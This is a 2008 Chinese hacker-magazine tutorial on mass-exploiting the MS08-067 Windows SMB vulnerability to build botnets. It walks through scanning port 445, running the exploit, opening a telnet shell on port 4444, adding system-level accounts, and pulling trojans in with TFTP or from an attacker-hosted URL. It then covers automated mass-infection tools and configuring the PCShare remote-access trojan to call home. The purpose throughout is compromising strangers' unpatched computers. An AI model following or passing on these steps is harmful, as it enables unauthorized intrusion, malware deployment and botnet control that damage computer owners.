0 微软最新MS08067漏洞批量抓肉鸡大法

此文章已发表在《黑客X档案》2008年第12期杂志上，转载请务必保留此信息！
一、初识
上月下旬，网上公布出了针对微软最新MS08067漏洞的测试程序，要知道这个漏洞可以继冲击波和震荡波之后，又一个非常严重的远程溢出漏洞，它的出现也预示了新一轮抓鸡狂潮的掀起，因为这个漏洞影响到了Windows2000/XP/Vista等操作系统的绝大多数版本，够强悍的吧！不过微软也已经推出补丁程序了，小菜们赶快为自己的电脑打上相应的补丁吧，补丁代号为KB958644。好了，下面就让我们一起来体验MS08067漏洞带来的入侵抓鸡快感吧！
二、初露锋芒
我们要用到的工具为Ssport和ms08067漏洞利用工具，首先打开Ssport，如图1，填入自己想扫描的IP地址段，例如我填写的就是172.16.10.1-172.16.10.255，然后点“添加”，端口号就选择445，接下来点击“扫描”后就耐心等待扫描结果吧，不一会儿结果就出来了，如图2，扫描到了好多开放445端口的主机，只有开放了445端口我们才有可能进行下一步的远程溢出哟。





随便选择一个IP，就172.16.10.4吧，打开CMD命令提示符并切换到MS08067的目录，直接运行MS08067，程序的使用格式出来了，如图3，我们只需要输入●MS08067 172.16.10.4●就行了，不需要其它的参数，来测试一下，运气不太好，出现了如图4所示的提示，表示对方主机有可能已经打过了补丁，还有一种可能就是因为对方开启了防火墙而溢出失败，如图5。而如果是单纯的出来一个“Make SMB Connection error:1203”的提示，则说明对方主机的Server、Workstation、Computer Browserz中的某个服务没有开启，所以导致溢出失败，我们只好换个主机再继续进行测试了。




当我测试到127时终于成功了，图片6，接下来我们就可以尝试使用TELNET远程登录对方的电脑了，连接命令为●telnet 172.16.10.127 4444●，这个端口号4444是溢出程序中固定使用的，telnet的时候必需要有，不然是无法登录成功的。telnet登录成功了，不需要任何验证，就得到了对方主机的一个cmdshell，如图7，我们来添加个帐号，看看我们现在是什么权限，添加成功了，是系统权限哟，如图8。现在我们就可以在对方的电脑中想怎么玩就怎么玩了。







需要注意的是，这个漏洞可以多次重复被溢出，比如我们已经TELNET进去了，可是因为某些原因又断开了连接，此时我们重新执行●TELNET 172.16.10.127 4444●是无法连接成功，必须再次溢出后才行。另外，我们TELNET进去后也会发现一个问题，就是如果输入错误，按退格键删除，然后改正后再回车执行，就会出现错误，图片9，这就是为什么有些小菜明明输入的命令正确可是为什么执行不了的原因，由于漏洞的原因在TELNET下面是不能使用退格键的，也就是说命令必须一次性输入成功，如果错误了就必须重新再来一次，不然怎么在原命令行上更改都是错误的（小编注：其实这个问题不是漏洞造成的，而是telnet的原因，建议大家在连接的时候尽量的使用nc，使用nc就不会出现这类的问题了），还有就是CLS清屏命令在TELNET下也是无效的，使用FTP也是没有回显的，如图10，如果我们想上传木马的话，除了使用FTP方式外，还可以使用TFTP命令，相信看过X档案的朋友对于这些上传方法一定不陌生吧，我就不累赘了（如果小菜们还不会的话，可以参看我们最新出版的“傻瓜黑客”一书，里面就包括了常用的文件上传方法，木马的配置和各种上线方法，以及常用的各种注入方法等，非常适合初学者学习）。如果我们想使用TFTP命令的话，就执行“TFTP -i 你的IP地址 get 你要上传的文件”，然后直接运行木马就可以了。
三、大展神威
现在大家都学会如何利用MS08067漏洞利用工具来抓肉鸡了吧，不过这样一台台的拿也太慢了吧，小菜们别心急，下面我就给大家详细介绍如何利用这个漏洞来批量抓肉鸡，首先请出目前名气最大、界面友好的 狼牙08067全自动抓鸡器和小北编写的批量溢出工具，其工具界面分别如图11和图12所示，另外一类就是纯粹的脚本型抓鸡器了，我个人比较喜欢的是深蓝加强版，图片13。
第一类工具拥有非常友好的界面，其优点是显而易见的，特别是狼牙，经过简单的配置就能疯狂的抓鸡，而且自己的木马还可以通过VBS脚本采用HTTP方式来下载，不过这个脚本如果被查杀的话就有些得不偿失了，工具还可以随时显示抓鸡的进度，不过它占用的资源也比较大。而脚本类抓鸡器需要自己修改的东西则相对多一些，需要我们手动修改IP段，而且必须要按照格式来设置，稍微有点错误就不能正常抓鸡了，另外还需要配置自己的FTP服务器，保密性比较差，必须明文填写FTP帐号和密码，如果在服务器上抓肉鸡的话容易被反查，但是却可以实现7*24小时不间断循环来抓肉鸡，不过矛盾的是有可能会造成重复中马，产生许多未知的问题。
我重点介绍一下狼牙全自动抓鸡工具的详细使用，打开狼牙全自动MS08-067抓鸡器，分别填写好开始IP和结束IP，大家可以填入一个IP段，但范围不要太大，不然容易卡死的，主机的数量最好每次保持在2000以内，在使用狼牙抓肉鸡前，我们也可以先配合S扫描器先大范围的扫描445端口，以便于提高溢出的效率。下面是线程数设置，如果有的朋友无法抓鸡的话，可以使用迅雷自带的XP优化工具来进行连接数的更改，改为512-1024就足够了，太大了也不好。至于端口号就使用默认的445，不然就无法准确抓肉鸡了。扫描方式一般建议使用TCP，如果没有结果，而对方也确实在线的话，就可以考虑使用SYN方式扫描一次，此项使用默认的TCP方式就行了。对于“木马地址”这一栏大家都非常熟悉吧，好多网马生成器的木马都是这样填写的，我们可以使用自己的BLOG空间等，如果还没有空间的话，X档案上目前可是有赠送空间的活动哟！我填写的是www.yofx.cn/yofx.exe，yofx.exe就是我放在自己BLOG根目录下的木马。
那我们要如何将生成的木马上传到自己的空间中呢，可以通过FTP进到网站根目录，一般都是WEB，当然也可能是WWWROOT，比如我们在根目录下创建一个目录muma，并把木马传到这个目录下，那么相应的地址也就变成www.yofx.cn/muma/yofx.exe了，我配置好的界面如图14所示，由于我使用的是Win2003系统，而且网速非常也非常快，所以线程也就开的比较大，大家可以酌情根据自己的网速来配置，一般家庭ADSL1M建议在100以内，其他的可以酌情添加。点击“开始抓鸡”按钮后程序就会自动进行扫描了，过程中会弹出CMD窗口，大家不要关闭或者进行其他操作，就让它自己运行吧，不然会影响抓鸡的，在运行时它的目录下会生成s.exe（这个用于扫描开放445端口的主机）和ms08-067.exe（这个就是今天的主角）以及Result.txt（用于记录S扫描器扫描到的开放445端口的IP地址）。不一会儿，扫描结果就出来了，存活主机38个，成功抓到了37个，对于未打补丁的系统，成功率可是极高的呀，如图15，除了一个没有开放445端口的外，其他扫描到的电脑全部沦陷了，至于上线的壮观场面就留给大家自己去享受吧，呵呵，我就不贴出来了。
接下来我再给大家简单介绍一下脚本抓鸡，它的配置文件IPS.txt主要用于存放IP段，格式很简单，写成 “172.16.10.1 172.16.10.255”这样就可以了，当然也可以同时添加多个IP段，具体做法就是另起一行，继续按照上面的格式来添加，运行后如图16所示，可以看到依次扫描了。我们来看下FTP的设置，只需要根据自己的实际情况进行相应的修改就行了，如图17，然后我们就可以运行xp.bat来进行抓鸡了，如果是使用Win2000/2003系统的话就运行win2k.BAT，当运行一段时间后，我们可以查看目录下的“成功主机.txt”，就能知道抓到多少个肉鸡了，这类工具的优势我在前面已经说过了，就是全自动循环，我们不关闭的话是不会停止的，所以需要大家手动关闭程序的运行。
看到这儿，可能又会有小菜有疑问了，为什么我的肉鸡不上线呢？关于肉鸡不上线的可能性有很多，比如说你的木马可能被对方的杀病毒软件杀掉了，又或者是对方的电脑安装有还原类软件，重启后木马就没有了，也有可能根本就没有上传成功。另外一个可能的问题就是配置了，我带大家一起进行PCSHARE的配置，我使用的是X档案专版，首先进行参数设定，只需要修改密码和端口号就行了，尽量选择一些不常用的端口，最好不使用80端口，很多朋友都出现了80端口被占用而无法上线的事情，我使用的是120端口，密码为7777。如果有朋友遇到远程监视屏幕黑屏，那我们就修改屏幕监控资源占用，选择高，把图像质量选择低，这样就可以有效的提升性能了，如果追求极速，则建议使用radmin，如图18。
继续进行上线的设置，点击创建用户，我们可以看到，可以直接使用IP上线，当然也可以使用域名上线，我使用的是FTP上线方式，选中“中转URL”，并把一个保存我们IP和端口信息的文件上传到我们的空间中，文件后缀为rar。比如172.16.10.20:120，前面就是你的IP地址，后面则为端口号，来测试一下看看，成功了，如图19，必须要与你的服务端监听端口一致，不然会无法上线的。
如果使用刷新IP功能，则需要注意的是不能使用域名，必须要使用IP，还有就是目录问题，许多朋友的FTP登录上去后都存在三个目录：db、log和web，而WEB里才是我们的东西，这样在IP.rar的填写上就需要加上目录，不然永远不能成功的，如图20。如果我们要使用其它上线方法，例如域名或者是端口映射，则请参照以前杂志上的相关文章，这里我就不多做解释了。好了，最后祝小菜们早日肉鸡成群，如果还有什么不懂的疑问请到X论坛提问，我会尽量帮大家解释的。——本文来自Q厦门虾米窝论坛 虾米都知道，因你而精彩!